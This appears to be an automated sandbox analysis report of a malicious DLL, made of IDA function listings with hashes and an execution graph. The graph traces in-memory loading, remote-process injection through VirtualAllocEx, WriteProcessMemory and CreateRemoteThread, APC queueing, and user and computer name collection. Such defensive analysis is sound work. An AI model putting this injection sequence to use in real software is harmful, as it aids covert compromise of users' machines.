                                                                                                                                                                                                                            • Opcode ID: 5368d8b1d24fe0368cc4e10c75a835cf7b4598258ec1be9622bc0c1957234e7a
                                                                                                                                                                                                                            • Instruction ID: 8344979c66b9cceb0b7acf630f590e38be3bd2ff735d44e9d3a026d285abadf4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5368d8b1d24fe0368cc4e10c75a835cf7b4598258ec1be9622bc0c1957234e7a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7518A3210468C8AEBA6CF2594447A977A0F358BC4F14C127FB8947BD5CF78D668CB11
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NameName::snprintfswprintf
                                                                                                                                                                                                                            • String ID: %lf
                                                                                                                                                                                                                            • API String ID: 3974891382-2891890143
                                                                                                                                                                                                                            • Opcode ID: 7fc1947d49ae169c503500e1267cacb441c981dc534258eb13393c19efbd0a35
                                                                                                                                                                                                                            • Instruction ID: 1d1499fd28cd0defdd0e894b6a29d0ba661b97baa627992bc5e4fd3905ed2300
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7fc1947d49ae169c503500e1267cacb441c981dc534258eb13393c19efbd0a35
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C01A221614B9840FB929B25B8013DBA361BF9A7C4F54C322BE5967B65DE2CC2578700
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NameName::snprintfswprintf
                                                                                                                                                                                                                            • String ID: %lf
                                                                                                                                                                                                                            • API String ID: 3974891382-2891890143
                                                                                                                                                                                                                            • Opcode ID: 43343db7a5785d265fd779c02874dbd2acc63c014a2a9ae2f7173fd214bdd341
                                                                                                                                                                                                                            • Instruction ID: e8046b89d42cedcdfa3f71cef9b3097e4d32cbc59f7538c484cb4a0ec4f8bfae
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43343db7a5785d265fd779c02874dbd2acc63c014a2a9ae2f7173fd214bdd341
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AF08631614BD890FB569B25B8013DBA361BF997C4F54C321BE5957B65CE3CC2578700
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,000000018001AF96,?,?,000000018001AF96,000000018001AF96,?,000000018001AF96,000000018001AF96,0000000180056604), ref: 0000000180056787
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,000000018001AF96,?,?,000000018001AF96,000000018001AF96,?,000000018001AF96,000000018001AF96,0000000180056604), ref: 0000000180056811
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                                                            • Opcode ID: b2a80129a009847c2ce996616dbbe413a05851c68b0ba3fa64774bcca3876923
                                                                                                                                                                                                                            • Instruction ID: 1260cb0f68ca8a8ce6bcd19fd34b1b076e826746dc0d6dce6279d08af0310b67
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2a80129a009847c2ce996616dbbe413a05851c68b0ba3fa64774bcca3876923
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E991E472F14A5885FBA2CB6594407ED2BA4F34CBD8F448205FE4A776A5CF36C68AC710
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2943138195-0
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+$Replicator::operator[]
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3863519203-0
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: __except_validate_context_record
                                                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                                                            • API String ID: 1467352782-3733052814
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Unwind__except_validate_context_record
                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                            • API String ID: 2208346422-1018135373
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: .$_.,
                                                                                                                                                                                                                            • API String ID: 3215553584-3384562259
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                            • API String ID: 2558813199-1018135373
                                                                                                                                                                                                                            • Opcode ID: 3012941d225893ff0a1596aed794f60caa97295d49179766bd7cee36fad85c83
                                                                                                                                                                                                                            • Instruction ID: 98e23b6382448741e885f2483867041e669b118fd1c307fb1a3f8b737a70bd12
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3012941d225893ff0a1596aed794f60caa97295d49179766bd7cee36fad85c83
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37513C7321578886E6A1EF15E4403AE77A4F38DBE0F148125FB8947B96DF38C565CB00
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memcpy_s
                                                                                                                                                                                                                            • String ID: s
                                                                                                                                                                                                                            • API String ID: 1502251526-453955339
                                                                                                                                                                                                                            • Opcode ID: d69b12cfc8f0d4f7e4e881a0439bac03a6efd0e78ae662d86089a4382a233e0c
                                                                                                                                                                                                                            • Instruction ID: 8ceb7f17a8548fb968498d81ab2351303633656c3688867a1d3cd218ddfc299c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d69b12cfc8f0d4f7e4e881a0439bac03a6efd0e78ae662d86089a4382a233e0c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43411332304A4887E3EA8F15E495FED7791F39878CF028116DE0957B81CB38CA4ACB49
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                                                                            • String ID: void$void
                                                                                                                                                                                                                            • API String ID: 2943138195-3746155364
                                                                                                                                                                                                                            • Opcode ID: ddeb0843d538297d14c0c0f86e427d1c8d1caa5713f6d320f941b1835034666f
                                                                                                                                                                                                                            • Instruction ID: 9e6cfc430d5bfee4d664579300960906288245c07229e058c69c646796c75a2c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddeb0843d538297d14c0c0f86e427d1c8d1caa5713f6d320f941b1835034666f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6311D76A10B58D8FB52CBA4E8403EC37B0B74C788F54852AEE4A67B55DF388259C750
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                            • Opcode ID: f9df25044fb1202a836735dffd389a5b3e506e3fb2604136da670c11918c1c4a
                                                                                                                                                                                                                            • Instruction ID: 75816c31b48d4b3f6ac9eaf605c0ba6bcc738f1132b3e0c24f52f264a28ed543
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9df25044fb1202a836735dffd389a5b3e506e3fb2604136da670c11918c1c4a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B811FB32214B4482EBA28B15E44039A77E5F78CBD8F688225EADD07759DF7DC655CB00
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLastLibraryLoad
                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                            • API String ID: 3568775529-2084034818
                                                                                                                                                                                                                            • Opcode ID: 3ce1118a3d68641cf7bcb52c8cfbeb9de588c640064439e36528d49136769137
                                                                                                                                                                                                                            • Instruction ID: d49a7e86271a456fbcda335a6394c0a77c9d8b30d4fb553590f1245fc1ea6585
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ce1118a3d68641cf7bcb52c8cfbeb9de588c640064439e36528d49136769137
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88F0653171150C82FBF69B6658457F622929B4DBD0F58D830FE0546791EE2D878E8700

                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                            Execution Coverage:6.6%
                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                            Signature Coverage:9.8%
                                                                                                                                                                                                                            Total number of Nodes:1524
                                                                                                                                                                                                                            Total number of Limit Nodes:77
29f3b751055 ExitProcess 19519->19527 19520->19527 19522 29f3b75276c 19521->19522 19528 29f3b7527bb 19521->19528 19523 29f3b752787 SetLastError 19522->19523 19524 29f3b752799 19522->19524 19523->19527 19526 29f3b752893 SetLastError 19524->19526 19524->19527 19525 29f3b752876 SetLastError 19525->19527 19526->19527 19528->19524 19528->19525 19564 29f3b751340 19529->19564 19532 29f3b75103a 19532->19517 19533 29f3b7520bf SetLastError 19533->19532 19534 29f3b7520d1 19535 29f3b751340 SetLastError 19534->19535 19536 29f3b7520f8 19535->19536 19536->19532 19537 29f3b75212c SetLastError 19536->19537 19538 29f3b75213e 19536->19538 19537->19532 19539 29f3b752160 19538->19539 19540 29f3b75214e SetLastError 19538->19540 19541 29f3b75216f SetLastError 19539->19541 19543 29f3b752181 GetNativeSystemInfo 19539->19543 19540->19532 19541->19532 19544 29f3b752288 SetLastError 19543->19544 19545 29f3b75229a VirtualAlloc 19543->19545 19544->19532 19546 29f3b7522ff GetProcessHeap HeapAlloc 19545->19546 19547 29f3b7522c7 VirtualAlloc 19545->19547 19548 29f3b752326 VirtualFree SetLastError 19546->19548 19549 29f3b75234b 19546->19549 19547->19546 19550 29f3b7522ed SetLastError 19547->19550 19548->19532 19551 29f3b751340 SetLastError 19549->19551 19550->19532 19552 29f3b7523fc 19551->19552 19553 29f3b75240a VirtualAlloc 19552->19553 19563 29f3b752400 19552->19563 19554 29f3b752450 19553->19554 19567 29f3b751380 19554->19567 19557 29f3b7524ac 19557->19563 19575 29f3b751c80 19557->19575 19561 29f3b752547 19562 29f3b7525da SetLastError 19561->19562 19561->19563 19562->19563 19563->19532 19595 29f3b7528e0 19563->19595 19565 29f3b75135f SetLastError 19564->19565 19566 29f3b75136e 19564->19566 19565->19566 19566->19532 19566->19533 19566->19534 19570 29f3b7513ce 19567->19570 19568 29f3b75149c 19571 29f3b751340 SetLastError 19568->19571 19569 29f3b75141e VirtualAlloc 19569->19570 19574 29f3b751458 19569->19574 19570->19568 19570->19569 19570->19574 19572 29f3b7514c0 19571->19572 19573 29f3b7514cb 
VirtualAlloc 19572->19573 19572->19574 19573->19574 19574->19557 19576 29f3b751cdd IsBadReadPtr 19575->19576 19585 29f3b751cd3 19575->19585 19578 29f3b751d1c 19576->19578 19576->19585 19579 29f3b751d65 SetLastError 19578->19579 19580 29f3b751d7d 19578->19580 19578->19585 19579->19585 19602 29f3b751200 19580->19602 19583 29f3b751db0 SetLastError 19583->19585 19585->19563 19588 29f3b751790 19585->19588 19586 29f3b751f9c SetLastError 19586->19585 19587 29f3b751de4 19587->19585 19587->19586 19589 29f3b751830 19588->19589 19591 29f3b751904 19589->19591 19593 29f3b751987 19589->19593 19611 29f3b7515e0 19589->19611 19590 29f3b7515e0 2 API calls 19594 29f3b75198b 19590->19594 19591->19561 19593->19590 19593->19594 19594->19561 19596 29f3b752900 19595->19596 19600 29f3b752905 19595->19600 19596->19532 19597 29f3b7529b1 19598 29f3b7529d4 GetProcessHeap HeapFree 19597->19598 19599 29f3b7529bd VirtualFree 19597->19599 19598->19596 19599->19598 19600->19597 19601 29f3b751190 VirtualFree 19600->19601 19601->19597 19603 29f3b75121f 19602->19603 19604 29f3b751215 19602->19604 19607 29f3b75122d 19603->19607 19610 29f3b7511c0 VirtualAlloc 19603->19610 19605 29f3b751070 VirtualQuery 19604->19605 19605->19603 19607->19583 19607->19587 19608 29f3b75123d 19608->19607 19609 29f3b751190 VirtualFree 19608->19609 19609->19607 19610->19608 19612 29f3b751608 19611->19612 19617 29f3b7515fe 19611->19617 19614 29f3b751619 19612->19614 19615 29f3b75168c VirtualProtect 19612->19615 19613 29f3b751664 VirtualFree 19613->19617 19614->19613 19614->19617 19615->19617 19617->19593 19324 273f41380 Sleep VirtualAllocEx 19325 273f413d2 WriteProcessMemory 19324->19325 19327 273f4144e 19324->19327 19326 273f41402 CreateRemoteThread 19325->19326 19325->19327 19326->19327 19328 273f4143c 19326->19328 19328->19327 19329 273f41440 WaitForSingleObject 19328->19329 19329->19327 19618 29f3b7515e0 19619 29f3b751608 19618->19619 19624 29f3b7515fe 19618->19624 19621 29f3b751619 19619->19621 19622 29f3b75168c 
VirtualProtect 19619->19622 19620 29f3b751664 VirtualFree 19620->19624 19621->19620 19621->19624 19622->19624 22580 273f41540 22581 273f4154f 22580->22581 22584 273f41380 Sleep VirtualAllocEx 22581->22584 22585 273f413d2 WriteProcessMemory 22584->22585 22587 273f4144e 22584->22587 22586 273f41402 CreateRemoteThread 22585->22586 22585->22587 22586->22587 22588 273f4143c 22586->22588 22588->22587 22589 273f41440 WaitForSingleObject 22588->22589 22589->22587 19330 29f3b8f55c0 19337 29f3b8f5609 19330->19337 19336 29f3b8f5eed 19400 29f3b8f8620 19336->19400 19337->19336 19370 29f3b914360 19337->19370 19338 29f3b8f57d1 19338->19336 19378 29f3b8ff3a0 19338->19378 19343 29f3b914ff0 NtQueueApcThread 19344 29f3b8f5eb0 19343->19344 19344->19336 19345 29f3b8f5ec5 19344->19345 19346 29f3b914ff0 NtQueueApcThread 19344->19346 19345->19336 19347 29f3b914ff0 NtQueueApcThread 19345->19347 19349 29f3b8f5f0e 19346->19349 19348 29f3b8f5ee9 19347->19348 19348->19336 19351 29f3b914ff0 NtQueueApcThread 19348->19351 19349->19336 19350 29f3b914ff0 NtQueueApcThread 19349->19350 19350->19345 19352 29f3b8f5f67 19351->19352 19352->19336 19353 29f3b914ff0 NtQueueApcThread 19352->19353 19354 29f3b8f5f93 19353->19354 19354->19336 19355 29f3b914ff0 NtQueueApcThread 19354->19355 19356 29f3b8f5fbf 19355->19356 19356->19336 19357 29f3b8f5fd4 19356->19357 19359 29f3b914ff0 NtQueueApcThread 19356->19359 19357->19336 19358 29f3b914ff0 NtQueueApcThread 19357->19358 19360 29f3b8f5ff8 19358->19360 19359->19357 19360->19336 19361 29f3b8f6033 19360->19361 19362 29f3b914ff0 NtQueueApcThread 19360->19362 19361->19336 19363 29f3b914ff0 NtQueueApcThread 19361->19363 19362->19361 19364 29f3b8f6057 19363->19364 19364->19336 19365 29f3b914ff0 NtQueueApcThread 19364->19365 19366 29f3b8f60a9 19365->19366 19366->19336 19367 29f3b914ff0 NtQueueApcThread 19366->19367 19368 29f3b8f60d5 19367->19368 19368->19336 19395 29f3b913a40 19368->19395 19372 29f3b9143bd 19370->19372 19371 29f3b8f5795 19371->19336 19374 29f3b9145f0 
19371->19374 19372->19371 19373 29f3b91444e NtCreateThreadEx 19372->19373 19373->19371 19376 29f3b914621 19374->19376 19375 29f3b914686 19375->19338 19376->19375 19377 29f3b914684 NtDuplicateObject 19376->19377 19377->19375 19379 29f3b8ff3bd 19378->19379 19380 29f3b8ff3f2 CreateToolhelp32Snapshot 19379->19380 19381 29f3b8ff610 19380->19381 19382 29f3b8ff418 Thread32First 19380->19382 19448 29f3b90b4e0 19381->19448 19382->19381 19389 29f3b8ff439 19382->19389 19384 29f3b8ff5fc Thread32Next 19384->19381 19384->19389 19385 29f3b8ff61c 19386 29f3b8f5871 19385->19386 19387 29f3b90b4e0 RtlFreeHeap 19385->19387 19386->19336 19391 29f3b914ff0 19386->19391 19387->19386 19389->19384 19390 29f3b8ff5fa NtResumeThread 19389->19390 19444 29f3b9151c0 19389->19444 19390->19384 19392 29f3b915011 19391->19392 19393 29f3b8f5e84 19392->19393 19394 29f3b91506a NtQueueApcThread 19392->19394 19393->19336 19393->19343 19394->19393 19452 29f3b914be0 19395->19452 19397 29f3b913b56 19397->19336 19398 29f3b913a97 19398->19397 19399 29f3b914be0 NtProtectVirtualMemory 19398->19399 19399->19398 19401 29f3b8f863e 19400->19401 19402 29f3b8f8632 19400->19402 19404 29f3b8f8654 19401->19404 19405 29f3b90b4e0 RtlFreeHeap 19401->19405 19403 29f3b90b4e0 RtlFreeHeap 19402->19403 19403->19401 19406 29f3b8f866a 19404->19406 19408 29f3b90b4e0 RtlFreeHeap 19404->19408 19405->19404 19407 29f3b8f8680 19406->19407 19409 29f3b90b4e0 RtlFreeHeap 19406->19409 19410 29f3b8f8696 19407->19410 19411 29f3b90b4e0 RtlFreeHeap 19407->19411 19408->19406 19409->19407 19412 29f3b8f86ac 19410->19412 19413 29f3b90b4e0 RtlFreeHeap 19410->19413 19411->19410 19414 29f3b8f86c2 19412->19414 19415 29f3b90b4e0 RtlFreeHeap 19412->19415 19413->19412 19416 29f3b8f86d8 19414->19416 19417 29f3b90b4e0 RtlFreeHeap 19414->19417 19415->19414 19418 29f3b8f86ee 19416->19418 19419 29f3b90b4e0 RtlFreeHeap 19416->19419 19417->19416 19420 29f3b8f8704 19418->19420 19421 29f3b90b4e0 RtlFreeHeap 19418->19421 19419->19418 19422 29f3b8f871a 19420->19422 
19423 29f3b90b4e0 RtlFreeHeap 19420->19423 19421->19420 19424 29f3b8f8730 19422->19424 19425 29f3b90b4e0 RtlFreeHeap 19422->19425 19423->19422 19426 29f3b8f8746 19424->19426 19427 29f3b90b4e0 RtlFreeHeap 19424->19427 19425->19424 19428 29f3b8f875c 19426->19428 19430 29f3b90b4e0 RtlFreeHeap 19426->19430 19427->19426 19429 29f3b8f8772 19428->19429 19431 29f3b90b4e0 RtlFreeHeap 19428->19431 19432 29f3b8f8782 19429->19432 19433 29f3b90b4e0 RtlFreeHeap 19429->19433 19430->19428 19431->19429 19434 29f3b8f87a6 19432->19434 19435 29f3b90b4e0 RtlFreeHeap 19432->19435 19433->19432 19436 29f3b8f87bc 19434->19436 19438 29f3b90b4e0 RtlFreeHeap 19434->19438 19435->19434 19437 29f3b8f87d2 19436->19437 19439 29f3b90b4e0 RtlFreeHeap 19436->19439 19440 29f3b8f87e8 19437->19440 19441 29f3b90b4e0 RtlFreeHeap 19437->19441 19438->19436 19439->19437 19442 29f3b8f6177 19440->19442 19443 29f3b90b4e0 RtlFreeHeap 19440->19443 19441->19440 19443->19442 19446 29f3b9151e2 19444->19446 19445 29f3b91523e 19445->19389 19446->19445 19447 29f3b91523c NtReadVirtualMemory 19446->19447 19447->19445 19449 29f3b90b523 19448->19449 19450 29f3b90b4f0 19448->19450 19449->19385 19450->19449 19451 29f3b90b511 RtlFreeHeap 19450->19451 19451->19449 19454 29f3b914c02 19452->19454 19453 29f3b914c5e 19453->19398 19454->19453 19455 29f3b914c5c NtProtectVirtualMemory 19454->19455 19455->19453 19485 29f3b914be0 19487 29f3b914c02 19485->19487 19486 29f3b914c5e 19487->19486 19488 29f3b914c5c NtProtectVirtualMemory 19487->19488 19488->19486 19627 29f3b8e7bf0 19628 29f3b8e7c06 19627->19628 19644 29f3b8e2930 19628->19644 19630 29f3b8e7c24 19783 29f3b8e8ed0 19630->19783 19632 29f3b8e7d64 19816 29f3b8e7f70 19632->19816 19634 29f3b8e7d8c 19957 29f3b904d00 GetUserNameW GetComputerNameExW 19634->19957 19636 29f3b8e7f54 19637 29f3b8e7da4 19637->19636 19989 29f3b914740 19637->19989 19640 29f3b8f4700 RtlFreeHeap 19643 29f3b8e7e3b 19640->19643 19642 29f3b8f8c60 CreateFiber DeleteFiber 19642->19643 19643->19636 19643->19640 
19643->19642 19993 29f3b8f3d90 19643->19993 20039 29f3b8e8bc0 19643->20039 20088 29f3b8effe0 19644->20088 19650 29f3b8e2943 19651 29f3b8ef5f5 19650->19651 20160 29f3b8ecce0 19650->20160 19651->19630 19654 29f3b8ecce0 LdrGetProcedureAddress 19655 29f3b8eee2b 19654->19655 19656 29f3b8ecce0 LdrGetProcedureAddress 19655->19656 19657 29f3b8eee54 19656->19657 19658 29f3b8ecce0 LdrGetProcedureAddress 19657->19658 19659 29f3b8eee73 19658->19659 19660 29f3b8ecce0 LdrGetProcedureAddress 19659->19660 19661 29f3b8eee92 19660->19661 19662 29f3b8ecce0 LdrGetProcedureAddress 19661->19662 19663 29f3b8eeeb1 19662->19663 19664 29f3b8ecce0 LdrGetProcedureAddress 19663->19664 19665 29f3b8eeed0 19664->19665 19666 29f3b8ecce0 LdrGetProcedureAddress 19665->19666 19667 29f3b8eeeef 19666->19667 19668 29f3b8ecce0 LdrGetProcedureAddress 19667->19668 19669 29f3b8eef0e 19668->19669 19670 29f3b8ecce0 LdrGetProcedureAddress 19669->19670 19671 29f3b8eef2d 19670->19671 19672 29f3b8ecce0 LdrGetProcedureAddress 19671->19672 19673 29f3b8eef4c 19672->19673 19674 29f3b8ecce0 LdrGetProcedureAddress 19673->19674 19675 29f3b8eef6b 19674->19675 19676 29f3b8ecce0 LdrGetProcedureAddress 19675->19676 19677 29f3b8eef8a 19676->19677 19678 29f3b8ecce0 LdrGetProcedureAddress 19677->19678 19679 29f3b8eefa9 19678->19679 19680 29f3b8ecce0 LdrGetProcedureAddress 19679->19680 19681 29f3b8eefc8 19680->19681 19682 29f3b8ecce0 LdrGetProcedureAddress 19681->19682 19683 29f3b8eefe7 19682->19683 19684 29f3b8ecce0 LdrGetProcedureAddress 19683->19684 19685 29f3b8ef006 19684->19685 19686 29f3b8ecce0 LdrGetProcedureAddress 19685->19686 19687 29f3b8ef025 19686->19687 19688 29f3b8ecce0 LdrGetProcedureAddress 19687->19688 19689 29f3b8ef044 19688->19689 19690 29f3b8ecce0 LdrGetProcedureAddress 19689->19690 19691 29f3b8ef063 19690->19691 19692 29f3b8ecce0 LdrGetProcedureAddress 19691->19692 19693 29f3b8ef082 19692->19693 19694 29f3b8ecce0 LdrGetProcedureAddress 19693->19694 19695 29f3b8ef0a1 19694->19695 19696 29f3b8ecce0 
LdrGetProcedureAddress 19695->19696 19697 29f3b8ef0c0 19696->19697 19698 29f3b8ecce0 LdrGetProcedureAddress 19697->19698 19699 29f3b8ef0df 19698->19699 19700 29f3b8ecce0 LdrGetProcedureAddress 19699->19700 19701 29f3b8ef0fe 19700->19701 19702 29f3b8ecce0 LdrGetProcedureAddress 19701->19702 19703 29f3b8ef11d 19702->19703 19704 29f3b8ecce0 LdrGetProcedureAddress 19703->19704 19705 29f3b8ef13c 19704->19705 19706 29f3b8ecce0 LdrGetProcedureAddress 19705->19706 19707 29f3b8ef15b 19706->19707 19708 29f3b8ecce0 LdrGetProcedureAddress 19707->19708 19709 29f3b8ef17a 19708->19709 19710 29f3b8ecce0 LdrGetProcedureAddress 19709->19710 19711 29f3b8ef199 19710->19711 19712 29f3b8ecce0 LdrGetProcedureAddress 19711->19712 19713 29f3b8ef1b8 19712->19713 19714 29f3b8ecce0 LdrGetProcedureAddress 19713->19714 19715 29f3b8ef1d7 19714->19715 19716 29f3b8ecce0 LdrGetProcedureAddress 19715->19716 19717 29f3b8ef1f6 19716->19717 19718 29f3b8ecce0 LdrGetProcedureAddress 19717->19718 19719 29f3b8ef215 19718->19719 19720 29f3b8ecce0 LdrGetProcedureAddress 19719->19720 19721 29f3b8ef234 19720->19721 19722 29f3b8ecce0 LdrGetProcedureAddress 19721->19722 19723 29f3b8ef253 19722->19723 19724 29f3b8ecce0 LdrGetProcedureAddress 19723->19724 19725 29f3b8ef272 19724->19725 19726 29f3b8ecce0 LdrGetProcedureAddress 19725->19726 19727 29f3b8ef291 19726->19727 19728 29f3b8ecce0 LdrGetProcedureAddress 19727->19728 19729 29f3b8ef2b0 19728->19729 19730 29f3b8ecce0 LdrGetProcedureAddress 19729->19730 19731 29f3b8ef2cf 19730->19731 19732 29f3b8ecce0 LdrGetProcedureAddress 19731->19732 19733 29f3b8ef2ee 19732->19733 19734 29f3b8ecce0 LdrGetProcedureAddress 19733->19734 19735 29f3b8ef30d 19734->19735 19736 29f3b8ecce0 LdrGetProcedureAddress 19735->19736 19737 29f3b8ef32c 19736->19737 19738 29f3b8ecce0 LdrGetProcedureAddress 19737->19738 19739 29f3b8ef34b 19738->19739 19740 29f3b8ecce0 